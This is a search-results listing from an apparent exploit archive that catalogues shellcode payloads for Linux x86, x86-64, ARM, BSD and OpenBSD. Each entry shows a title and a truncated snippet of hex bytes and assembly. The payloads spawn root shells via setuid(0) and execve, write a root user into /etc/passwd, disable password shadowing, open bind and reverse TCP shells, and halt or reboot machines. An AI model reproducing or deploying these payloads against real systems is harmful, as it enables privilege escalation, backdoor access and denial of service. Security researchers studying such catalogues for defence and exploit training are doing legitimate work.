5626 matches found
Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx...
BSD/x86 - execve (/bin/sh) + seteuid(0) Shellcode (31 bytes)
/ simply execvebinsh+seteuid0 shellcode in 31 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org nerf nerf /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73"...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena //bin/sh con un 0 "\x68\x6e\x2f\x73\x68"...
Linux/x86 - Disable Shadowing Shellcode (42 bytes)
include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena con un 0 "\x68\x63\x6f\x6e\x76" //push dword...
Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)
/ jmp callw00w00 w00w00: popl %edi jmp w0w0w callw00w00: call w00w00 w0w0w: OPEN ecx=flag ORDONLY, OWRONLY, ... OWRONLY | OAPPEND | OCREAT = 0x441 edx=file mode ebx=address of filename eax=0x05 syscall number xorl %ebx,%ebx movb $file-w0w0w,%bl addl %edi,%ebx xorb %al,%al movb %al,11%ebx xorl...
Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)
/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 36 bytes OS = Linux i386 written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callit doit: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al mov byte al,83 lea ebx,esi lea ecx,esi+8 int...
Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)
include const char shellcode= "\x40" // inc %eax // "\x43" // inc %ebx "\xcd\x80"; // int $0x80 int main printf "\n+ Yet conditional %eax==0 Linux/x86 exit0 3 bytes or exit1 4 bytes" "\n+ Date: 18/06/2009" "\n+ Author: TheWorm" "\n\n+ Shellcode Size: %d bytes\n\n", sizeofshellcode-1; void...
Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)
include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can write "\x6a\x0b\x58" instead of "\xb0\x0b", but the...
Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // pu...
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)
/ linux/x86 portbind /bin/sh port 64713 83 bytes http://www.gonullyourself.org sToRm / char shellcode = // : "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x53" // push %ebx "\x43" // inc %ebx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx...
Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push $0x74756873 "\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69 "\x68\x2f\x2f\x73\x62" // push $0x62732f2f "\x89\xe3" // mov...
Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)
/ linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte shellcode in all caps. I wasn't able to beat his code, but it's no longer special. / char shellcode = /...
Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
/ This shellcode writes to /etc/passwd the string for the user with uid&gid == 0; written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: nerf w00w00 BITS 32 jmp short path main: pop esi xor eax,eax push eax mov byte esi+11,al mov al,0x0a push eax push esi mov al,5 push eax...
Linux/x86-64 - setreuid(0,0) + execve(/bin/zsh, [/bin/zsh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
; =================================================================== ; Password Protected Bind Shell ; Author: SLAE64-1351 Keyman ; Date: 03/09/2014 ; ; Shellcode length: 147 bytes ; ; Description: ; ; Simple bind shell listens on port 4444 by default with 4 bytes ; password protection. Using a ...
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
/ ; Title: shutdown -h now x8664 Shellcode - 65 bytes ; Platform: linux/x8664 ; Date: 2014-06-27 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: xor rax, rax xor rdx, rdx push rax push byte 0x77 push word 0x6f6e ; now mov rbx, rsp push rax push word 0x682d ;-h m...
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh + Password MyPasswd + Null-Free Shellcode 156 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Autho...
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-877.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 64 bytes got shorter by 1 byte :D ; ; What's new is that some...
OpenBSD/x86 - reboot() Shellcode (15 bytes)
// ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : email protected // email protected char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret = int &ret + 2; ret = intshellcode; //...